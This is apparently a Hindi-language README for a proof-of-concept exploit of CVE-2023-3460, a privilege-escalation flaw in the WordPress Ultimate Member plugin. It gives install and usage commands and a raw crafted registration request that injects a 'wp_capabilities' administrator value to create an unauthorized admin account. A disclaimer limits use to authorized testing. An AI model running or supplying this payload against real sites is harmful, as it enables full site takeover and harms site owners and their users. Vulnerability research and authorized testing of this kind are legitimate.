
CVE-2023-3460 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक WordPress Ultimate Member विशेषाधिकार वृद्धि भेद्यता। क्राफ्टेड रजिस्ट्रेशन अनुरोध के माध्यम से एक एडमिन खाता बनाता है। केवल अधिकृत परीक्षण के लिए।
यह CVE-2023-3460 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण है, जो वर्डप्रेस प्लगइन Ultimate Member में एक महत्वपूर्ण कमजोरी है। यह अप्रमाणित उपयोगकर्ताओं को एक दुर्भावनापूर्ण पंजीकरण अनुरोध बनाकर उनके विशेषाधिकारों को प्रशासक तक बढ़ाने की अनुमति देता है।
🔥 प्रभाव: अनधिकृत व्यवस्थापक खाता निर्माण के माध्यम से पूरी साइट से समझौता।
requests लाइब्रेरीurllib3 लाइब्रेरीbeautifulsoup4 लाइब्रेरीआवश्यकताएँ स्थापित करें:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) प्राप्त करता हैwp_capabilities को administrator भूमिका के साथ इंजेक्ट करता हैPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान की गई है। सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है। इसका उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनका परीक्षण करने की अनुमति है।